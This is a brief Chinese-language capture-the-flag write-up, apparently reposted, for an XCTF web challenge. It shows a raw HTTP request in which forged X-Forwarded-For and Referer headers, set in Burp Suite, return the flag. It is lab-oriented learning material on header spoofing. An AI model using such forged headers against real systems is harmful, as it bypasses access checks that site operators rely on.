Web—來源地址和ip偽造


分析

題目說明:X老師告訴小寧其實xff和referer是可以偽造。

用Burp Suites偽造X-Forwarded-For和Referer獲取flag

 

GET / HTTP/1.1
Host: xxx.xxx.xx.xx:32032
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:53.0) Gecko/20100101 Firefox/55.0
X-Forwarded-For: 123.123.123.123
Referer: https://www.google.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

 

注意:X-Forwarded-For和Referer插入在后面有時會不起作用

題目:XCTF的web題


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM